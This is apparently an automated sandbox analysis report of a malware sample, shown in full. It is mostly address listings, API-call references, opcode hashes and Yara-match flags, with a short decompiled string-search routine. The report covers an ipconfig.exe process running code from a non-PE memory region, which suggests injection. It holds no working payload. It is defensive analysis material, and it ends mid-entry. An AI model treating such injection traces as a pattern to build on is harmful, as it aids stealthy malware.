                                                                                                    0x004062a8
                                                                                                    0x004062a8
                                                                                                    0x004062ae
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004062b0
                                                                                                    0x004062b3
                                                                                                    0x004062b6
                                                                                                    0x004062b9
                                                                                                    0x004062bc
                                                                                                    0x004062bf
                                                                                                    0x004062c2
                                                                                                    0x004062c5
                                                                                                    0x004062c8
                                                                                                    0x004062cb
                                                                                                    0x004062ce
                                                                                                    0x004062e6
                                                                                                    0x004062e9
                                                                                                    0x004062ec
                                                                                                    0x004062ef
                                                                                                    0x004062ef
                                                                                                    0x004062f2
                                                                                                    0x004062f6
                                                                                                    0x004062f8
                                                                                                    0x004062d0
                                                                                                    0x004062d0
                                                                                                    0x004062d8
                                                                                                    0x004062dd
                                                                                                    0x004062df
                                                                                                    0x004062e1
                                                                                                    0x004062e1
                                                                                                    0x004062fb
                                                                                                    0x00406302
                                                                                                    0x00406305
                                                                                                    0x00000000
                                                                                                    0x00406307
                                                                                                    0x00000000
                                                                                                    0x00406307
                                                                                                    0x00406305
                                                                                                    0x0040630c
                                                                                                    0x0040630c
                                                                                                    0x0040630c
                                                                                                    0x0040630c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406347
                                                                                                    0x00406347
                                                                                                    0x0040634b
                                                                                                    0x00406953
                                                                                                    0x00000000
                                                                                                    0x00406953
                                                                                                    0x00406351
                                                                                                    0x00406354
                                                                                                    0x00406357
                                                                                                    0x0040635b
                                                                                                    0x0040635e
                                                                                                    0x00406364
                                                                                                    0x00406366
                                                                                                    0x00406366
                                                                                                    0x00406366
                                                                                                    0x00406369
                                                                                                    0x0040636c
                                                                                                    0x0040636c
                                                                                                    0x00406372
                                                                                                    0x00406310
                                                                                                    0x00406310
                                                                                                    0x00406313
                                                                                                    0x00000000
                                                                                                    0x00406313
                                                                                                    0x00406374
                                                                                                    0x00406374
                                                                                                    0x00406377
                                                                                                    0x0040637a
                                                                                                    0x0040637d
                                                                                                    0x00406380
                                                                                                    0x00406383
                                                                                                    0x00406386
                                                                                                    0x00406389
                                                                                                    0x0040638c
                                                                                                    0x0040638f
                                                                                                    0x00406392
                                                                                                    0x004063aa
                                                                                                    0x004063ad
                                                                                                    0x004063b0
                                                                                                    0x004063b3
                                                                                                    0x004063b3
                                                                                                    0x004063b6
                                                                                                    0x004063ba
                                                                                                    0x004063bc
                                                                                                    0x00406394
                                                                                                    0x00406394
                                                                                                    0x0040639c
                                                                                                    0x004063a1
                                                                                                    0x004063a3
                                                                                                    0x004063a5
                                                                                                    0x004063a5
                                                                                                    0x004063bf
                                                                                                    0x004063c6
                                                                                                    0x004063c9
                                                                                                    0x00000000
                                                                                                    0x004063cb
                                                                                                    0x00000000
                                                                                                    0x004063cb
                                                                                                    0x00000000
                                                                                                    0x00406658
                                                                                                    0x00406658
                                                                                                    0x0040665c
                                                                                                    0x00406983
                                                                                                    0x00000000
                                                                                                    0x00406983
                                                                                                    0x00406662
                                                                                                    0x00406665
                                                                                                    0x00406668
                                                                                                    0x0040666c
                                                                                                    0x0040666f
                                                                                                    0x00406675
                                                                                                    0x00406677
                                                                                                    0x00406677
                                                                                                    0x00406677
                                                                                                    0x0040667a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406428
                                                                                                    0x00406428
                                                                                                    0x0040642b
                                                                                                    0x0040679d
                                                                                                    0x0040679d
                                                                                                    0x00000000
                                                                                                    0x0040679d
                                                                                                    0x00000000
                                                                                                    0x00406767
                                                                                                    0x0040676b
                                                                                                    0x0040678d
                                                                                                    0x00406790
                                                                                                    0x0040679a
                                                                                                    0x0040679d
                                                                                                    0x0040679d
                                                                                                    0x00000000
                                                                                                    0x0040679d
                                                                                                    0x0040679d
                                                                                                    0x0040676d
                                                                                                    0x00406770
                                                                                                    0x00406774
                                                                                                    0x00406777
                                                                                                    0x00406777
                                                                                                    0x0040677a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406824
                                                                                                    0x00406828
                                                                                                    0x00406846
                                                                                                    0x00406846
                                                                                                    0x00406846
                                                                                                    0x0040684d
                                                                                                    0x00406854
                                                                                                    0x0040685b
                                                                                                    0x0040685b
                                                                                                    0x00000000
                                                                                                    0x0040685b
                                                                                                    0x0040682a
                                                                                                    0x0040682d
                                                                                                    0x00406830
                                                                                                    0x00406833
                                                                                                    0x0040683a
                                                                                                    0x0040677e
                                                                                                    0x0040677e
                                                                                                    0x00406781
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406915
                                                                                                    0x00406918
                                                                                                    0x00406819
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040654f
                                                                                                    0x00406551
                                                                                                    0x00406558
                                                                                                    0x00406559
                                                                                                    0x0040655b
                                                                                                    0x0040655e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406566
                                                                                                    0x00406569
                                                                                                    0x0040656c
                                                                                                    0x0040656e
                                                                                                    0x00406570
                                                                                                    0x00406570
                                                                                                    0x00406571
                                                                                                    0x00406574
                                                                                                    0x0040657b
                                                                                                    0x0040657e
                                                                                                    0x0040658c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406862
                                                                                                    0x00406862
                                                                                                    0x00406865
                                                                                                    0x0040686c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406871
                                                                                                    0x00406871
                                                                                                    0x00406875
                                                                                                    0x004069ad
                                                                                                    0x00000000
                                                                                                    0x004069ad
                                                                                                    0x0040687b
                                                                                                    0x0040687e
                                                                                                    0x00406881
                                                                                                    0x00406885
                                                                                                    0x00406888
                                                                                                    0x0040688e
                                                                                                    0x00406890
                                                                                                    0x00406890
                                                                                                    0x00406890
                                                                                                    0x00406893
                                                                                                    0x00406896
                                                                                                    0x00406896
                                                                                                    0x00406896
                                                                                                    0x00406896
                                                                                                    0x00406899
                                                                                                    0x00406899
                                                                                                    0x0040689d
                                                                                                    0x004068fd
                                                                                                    0x00406900
                                                                                                    0x00406905
                                                                                                    0x00406906
                                                                                                    0x00406908
                                                                                                    0x0040690a
                                                                                                    0x0040690d
                                                                                                    0x00406819
                                                                                                    0x00406819
                                                                                                    0x00000000
                                                                                                    0x0040681f
                                                                                                    0x00406819
                                                                                                    0x0040689f
                                                                                                    0x004068a5
                                                                                                    0x004068a8
                                                                                                    0x004068ab
                                                                                                    0x004068ae
                                                                                                    0x004068b1
                                                                                                    0x004068b4
                                                                                                    0x004068b7
                                                                                                    0x004068ba
                                                                                                    0x004068bd
                                                                                                    0x004068c0
                                                                                                    0x004068d9
                                                                                                    0x004068dc
                                                                                                    0x004068df
                                                                                                    0x004068e2
                                                                                                    0x004068e6
                                                                                                    0x004068e8
                                                                                                    0x004068e8
                                                                                                    0x004068e9
                                                                                                    0x004068ec
                                                                                                    0x004068c2
                                                                                                    0x004068c2
                                                                                                    0x004068ca
                                                                                                    0x004068cf
                                                                                                    0x004068d1
                                                                                                    0x004068d4
                                                                                                    0x004068d4
                                                                                                    0x004068ef
                                                                                                    0x004068f6
                                                                                                    0x00000000
                                                                                                    0x004068f8
                                                                                                    0x00000000
                                                                                                    0x004068f8
                                                                                                    0x00000000
                                                                                                    0x00406594
                                                                                                    0x00406597
                                                                                                    0x004065cd
                                                                                                    0x004066fd
                                                                                                    0x004066fd
                                                                                                    0x004066fd
                                                                                                    0x004066fd
                                                                                                    0x00406700
                                                                                                    0x00406700
                                                                                                    0x00406703
                                                                                                    0x00406705
                                                                                                    0x0040698f
                                                                                                    0x00000000
                                                                                                    0x0040698f
                                                                                                    0x0040670b
                                                                                                    0x0040670e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406714
                                                                                                    0x00406718
                                                                                                    0x0040671b
                                                                                                    0x0040671b
                                                                                                    0x0040671b
                                                                                                    0x00000000
                                                                                                    0x0040671b
                                                                                                    0x00406599
                                                                                                    0x0040659b
                                                                                                    0x0040659d
                                                                                                    0x0040659f
                                                                                                    0x004065a2
                                                                                                    0x004065a3
                                                                                                    0x004065a5
                                                                                                    0x004065a7
                                                                                                    0x004065aa
                                                                                                    0x004065ad
                                                                                                    0x004065c3
                                                                                                    0x004065c8
                                                                                                    0x00406600
                                                                                                    0x00406600
                                                                                                    0x00406604
                                                                                                    0x00406630
                                                                                                    0x00406632
                                                                                                    0x00406639
                                                                                                    0x0040663c
                                                                                                    0x0040663f
                                                                                                    0x0040663f
                                                                                                    0x00406644
                                                                                                    0x00406644
                                                                                                    0x00406646
                                                                                                    0x00406649
                                                                                                    0x00406650
                                                                                                    0x00406653
                                                                                                    0x00406680
                                                                                                    0x00406680
                                                                                                    0x00406683
                                                                                                    0x00406686
                                                                                                    0x004066fa
                                                                                                    0x004066fa
                                                                                                    0x004066fa
                                                                                                    0x00000000
                                                                                                    0x004066fa
                                                                                                    0x00406688
                                                                                                    0x0040668e
                                                                                                    0x00406691
                                                                                                    0x00406694
                                                                                                    0x00406697
                                                                                                    0x0040669a
                                                                                                    0x0040669d
                                                                                                    0x004066a0
                                                                                                    0x004066a3
                                                                                                    0x004066a6
                                                                                                    0x004066a9
                                                                                                    0x004066c2
                                                                                                    0x004066c4
                                                                                                    0x004066c7
                                                                                                    0x004066c8
                                                                                                    0x004066cb
                                                                                                    0x004066cd
                                                                                                    0x004066d0
                                                                                                    0x004066d2
                                                                                                    0x004066d4
                                                                                                    0x004066d7
                                                                                                    0x004066d9
                                                                                                    0x004066dc
                                                                                                    0x004066e0
                                                                                                    0x004066e2
                                                                                                    0x004066e2
                                                                                                    0x004066e3
                                                                                                    0x004066e6
                                                                                                    0x004066e9
                                                                                                    0x004066ab
                                                                                                    0x004066ab
                                                                                                    0x004066b3
                                                                                                    0x004066b8
                                                                                                    0x004066ba
                                                                                                    0x004066bd
                                                                                                    0x004066bd
                                                                                                    0x004066ec
                                                                                                    0x004066f3
                                                                                                    0x0040667d
                                                                                                    0x0040667d
                                                                                                    0x0040667d
                                                                                                    0x0040667d
                                                                                                    0x00000000
                                                                                                    0x004066f5
                                                                                                    0x00000000
                                                                                                    0x004066f5
                                                                                                    0x004066f3
                                                                                                    0x00406606
                                                                                                    0x00406609
                                                                                                    0x0040660b
                                                                                                    0x0040660e
                                                                                                    0x00406611
                                                                                                    0x00406614
                                                                                                    0x00406616
                                                                                                    0x00406619
                                                                                                    0x0040661c
                                                                                                    0x0040661c
                                                                                                    0x0040661f
                                                                                                    0x0040661f
                                                                                                    0x00406622
                                                                                                    0x00406629
                                                                                                    0x004065fd
                                                                                                    0x004065fd
                                                                                                    0x004065fd
                                                                                                    0x004065fd
                                                                                                    0x00000000
                                                                                                    0x0040662b
                                                                                                    0x00000000
                                                                                                    0x0040662b
                                                                                                    0x00406629
                                                                                                    0x004065af
                                                                                                    0x004065b2
                                                                                                    0x004065b4
                                                                                                    0x004065b7
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406316
                                                                                                    0x00406316
                                                                                                    0x0040631a
                                                                                                    0x0040695f
                                                                                                    0x00000000
                                                                                                    0x0040695f
                                                                                                    0x00406320
                                                                                                    0x00406323
                                                                                                    0x00406326
                                                                                                    0x00406329
                                                                                                    0x0040632c
                                                                                                    0x0040632f
                                                                                                    0x00406332
                                                                                                    0x00406334
                                                                                                    0x00406337
                                                                                                    0x0040633a
                                                                                                    0x0040633d
                                                                                                    0x0040633f
                                                                                                    0x0040633f
                                                                                                    0x0040633f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004064a1
                                                                                                    0x004064a1
                                                                                                    0x004064a5
                                                                                                    0x0040696b
                                                                                                    0x00000000
                                                                                                    0x0040696b
                                                                                                    0x004064ab
                                                                                                    0x004064ae
                                                                                                    0x004064b1
                                                                                                    0x004064b4
                                                                                                    0x004064b6
                                                                                                    0x004064b6
                                                                                                    0x004064b6
                                                                                                    0x004064b9
                                                                                                    0x004064bc
                                                                                                    0x004064bf
                                                                                                    0x004064c2
                                                                                                    0x004064c5
                                                                                                    0x004064c8
                                                                                                    0x004064c9
                                                                                                    0x004064cb
                                                                                                    0x004064cb
                                                                                                    0x004064cb
                                                                                                    0x004064ce
                                                                                                    0x004064d1
                                                                                                    0x004064d4
                                                                                                    0x004064d7
                                                                                                    0x004064d7
                                                                                                    0x004064d7
                                                                                                    0x004064da
                                                                                                    0x004064dc
                                                                                                    0x004064dc
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040671e
                                                                                                    0x0040671e
                                                                                                    0x0040671e
                                                                                                    0x00406722
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406728
                                                                                                    0x0040672b
                                                                                                    0x0040672e
                                                                                                    0x00406731
                                                                                                    0x00406733
                                                                                                    0x00406733
                                                                                                    0x00406733
                                                                                                    0x00406736
                                                                                                    0x00406739
                                                                                                    0x0040673c
                                                                                                    0x0040673f
                                                                                                    0x00406742
                                                                                                    0x00406745
                                                                                                    0x00406746
                                                                                                    0x00406748
                                                                                                    0x00406748
                                                                                                    0x00406748
                                                                                                    0x0040674b
                                                                                                    0x0040674e
                                                                                                    0x00406751
                                                                                                    0x00406754
                                                                                                    0x00406757
                                                                                                    0x0040675b
                                                                                                    0x0040675d
                                                                                                    0x00406760
                                                                                                    0x00000000
                                                                                                    0x00406762
                                                                                                    0x004064df
                                                                                                    0x004064df
                                                                                                    0x00000000
                                                                                                    0x004064df
                                                                                                    0x00406760
                                                                                                    0x00406995
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00405fc4
                                                                                                    0x004069cc
                                                                                                    0x004069cc
                                                                                                    0x00000000
                                                                                                    0x004069cc
                                                                                                    0x00406819
                                                                                                    0x004067a0
                                                                                                    0x0040679d

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c10b0ec6d8a1716373c4594016b158d4b4e2bf5790cbb1f15a9d43b973b4a336
                                                                                                    • Instruction ID: fa01dbb36adddbb747bc37ce8d7c8691094d52a97b4972d7f98645f49a39bfe1
                                                                                                    • Opcode Fuzzy Hash: c10b0ec6d8a1716373c4594016b158d4b4e2bf5790cbb1f15a9d43b973b4a336
                                                                                                    • Instruction Fuzzy Hash: B3715671D00229CBEF28CF98C844BADBBB1FF44305F11816AD856BB281C7795A56DF54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004057B2, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E004057B2(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                                                                                                    0x004057be
                                                                                                    0x004057c0
                                                                                                    0x004057e8
                                                                                                    0x004057cd
                                                                                                    0x004057d2
                                                                                                    0x004057dd
                                                                                                    0x00000000
                                                                                                    0x004057fa
                                                                                                    0x004057e6
                                                                                                    0x004057e6
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057B9
                                                                                                    • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057D2
                                                                                                    • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004057E0
                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057E9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                    • String ID:
                                                                                                    • API String ID: 190613189-0
                                                                                                    • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                                                                                    • Instruction ID: 042c172281cf084eebf1820456e7eb749b121a10276c912c68532230cfd8689c
                                                                                                    • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                                                                                    • Instruction Fuzzy Hash: BBF0A736249D51DBC2029B295C44E6FBEA4EF95355F14057EF440F3180D335AC11ABBB
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Analysis Process: ipconfig.exe PID: 6328 Parent PID: 3440 ipconfig.exeCOMMON

                                                                                                    Executed Functions

                                                                                                    Function 02F78212, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57filenativeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,02F73B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02F73B97,007A002E,00000000,00000060,00000000,00000000), ref: 02F7820D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.597762565.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID: .z`
                                                                                                    • API String ID: 823142352-1441809116
                                                                                                    • Opcode ID: aa307f6185f4c2e57b20fd9c61cd256703e6afbd53541d80ae249db0eecc0c7f
                                                                                                    • Instruction ID: 88368d86d9c30e7993a33a73ce58d2753782b55014191da7bbeb5ef63ee77ef2
                                                                                                    • Opcode Fuzzy Hash: aa307f6185f4c2e57b20fd9c61cd256703e6afbd53541d80ae249db0eecc0c7f
                                                                                                    • Instruction Fuzzy Hash: 5301D7B6210108AFDB18DF98DC84EEB77ADEF8C754F158649FA1D97241D630EC118BA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02F781BA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56filenativeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,02F73B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02F73B97,007A002E,00000000,00000060,00000000,00000000), ref: 02F7820D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.597762565.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID: .z`
                                                                                                    • API String ID: 823142352-1441809116
                                                                                                    • Opcode ID: bc6b20c36ddcd952e5e5cf8f839bb67ecf1ab6d374f131e0b7e47daba3cf7331
                                                                                                    • Instruction ID: 0a82ca26b49320eadd70af638918344d5119812a9013c25aa7e68dea7661393b
                                                                                                    • Opcode Fuzzy Hash: bc6b20c36ddcd952e5e5cf8f839bb67ecf1ab6d374f131e0b7e47daba3cf7331
                                                                                                    • Instruction Fuzzy Hash: 1A11B3B2204109AFDB18DF98DC94DEB77ADEF8C754B148649FA5D97240C630E8118BA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02F781C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,02F73B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02F73B97,007A002E,00000000,00000060,00000000,00000000), ref: 02F7820D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.597762565.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID: .z`
                                                                                                    • API String ID: 823142352-1441809116
                                                                                                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                    • Instruction ID: e0392da860ee30a417d171f0408ecef350dfecf1100671cb1a4a8353b4bd1681
                                                                                                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                    • Instruction Fuzzy Hash: 59F0B2B2200208AFCB08CF88DC84EEB77ADAF8C754F158248FA0D97240C630E8118BA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02F78270, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • NtReadFile.NTDLL(02F73D52,5E972F59,FFFFFFFF,02F73A11,?,?,02F73D52,?,02F73A11,FFFFFFFF,5E972F59,02F73D52,?,00000000), ref: 02F782B5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.597762565.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 2738559852-0
                                                                                                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                    • Instruction ID: d2eaf928a37fd1a3e9cea2a6cca6e5ae439caf801898b2d6d9d6e0cc08bce733
                                                                                                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                    • Instruction Fuzzy Hash: 12F0A4B2200208AFCB14DF89DC84EEB77ADAF8C754F158649BA1D97241DA30E8118BA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02F7826A, Relevance: 1.5, APIs: 1, Instructions: 35filenativeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • NtReadFile.NTDLL(02F73D52,5E972F59,FFFFFFFF,02F73A11,?,?,02F73D52,?,02F73A11,FFFFFFFF,5E972F59,02F73D52,?,00000000), ref: 02F782B5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.597762565.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 2738559852-0
                                                                                                    • Opcode ID: be004146bb275068de8f8f05b918ab1fa1c8abc8c6f984c425940b63b98e686d
                                                                                                    • Instruction ID: 8fb031eb1f95735cdfb4b158667d4e63aabd5d34795d05297640c36cecbb8121
                                                                                                    • Opcode Fuzzy Hash: be004146bb275068de8f8f05b918ab1fa1c8abc8c6f984c425940b63b98e686d
                                                                                                    • Instruction Fuzzy Hash: 3AF01DB6200045ABCB08DF98CC80CEB77ADEF8C354B198649FE1CA7205CA30E815CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02F782F0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • NtClose.NTDLL(02F73D30,?,?,02F73D30,00000000,FFFFFFFF), ref: 02F78315
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.597762565.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Close
                                                                                                    • String ID:
                                                                                                    • API String ID: 3535843008-0
                                                                                                    • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                    • Instruction ID: 024c081b91983df1fff10645de2f58a1fb2242b3d40db956ed2fbfdd20a626f7
                                                                                                    • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                    • Instruction Fuzzy Hash: 41D012752002146BD710EF98CC45E97775DEF44750F154455BA195B241C530F90086E0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 036E9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.597959759.0000000003680000.00000040.00000001.sdmp, Offset: 03680000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.598212454.000000000379B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 0000000A.00000002.598221792.000000000379F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 5eba0d3e200ea7d11dd862e3c8a896d6d32eff785c6c37f884b8ee9037405313
                                                                                                    • Instruction ID: f0e70c66fb9641888cb17e3dce8b763de5d2e384158e266b07efdbee9c5ecc4c
                                                                                                    • Opcode Fuzzy Hash: 5eba0d3e200ea7d11dd862e3c8a896d6d32eff785c6c37f884b8ee9037405313
                                                                                                    • Instruction Fuzzy Hash: 9590026121184446D200A9694C15B07000997D1343F52C115A1144554CCA5598617561
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 036E9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.597959759.0000000003680000.00000040.00000001.sdmp, Offset: 03680000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.598212454.000000000379B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 0000000A.00000002.598221792.000000000379F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: ee0478530ac397de59824b4c2ea47fa687f9d82373f645a9374e1b1bebda69c6
                                                                                                    • Instruction ID: 18730a650dacd4e2a4e6eb1b00042b0177eec987b6b3cd90d27b2d45c691e439
                                                                                                    • Opcode Fuzzy Hash: ee0478530ac397de59824b4c2ea47fa687f9d82373f645a9374e1b1bebda69c6
                                                                                                    • Instruction Fuzzy Hash: 229002B120104806D140B5594405746000997D1341F52C011A6054554E87999DD576A5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 036E99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.597959759.0000000003680000.00000040.00000001.sdmp, Offset: 03680000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.598212454.000000000379B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 0000000A.00000002.598221792.000000000379F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 1235b60f6de69e7b97a0a2a916e950e6b91e0c3e3f391216d0f10d1f4ace362c
                                                                                                    • Instruction ID: b2b912b9095a2ce404934902cf57b749361b29cf41b29a89052f37bc029345d9
                                                                                                    • Opcode Fuzzy Hash: 1235b60f6de69e7b97a0a2a916e950e6b91e0c3e3f391216d0f10d1f4ace362c
                                                                                                    • Instruction Fuzzy Hash: 819002A134104846D100A5594415B060009D7E2341F52C015E2054554D8759DC527166
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 036E9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.597959759.0000000003680000.00000040.00000001.sdmp, Offset: 03680000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.598212454.000000000379B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 0000000A.00000002.598221792.000000000379F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: d46f4bc899b46e706c4125ff23ec7a408a69498b7c556659a78a4d0331fbc18c
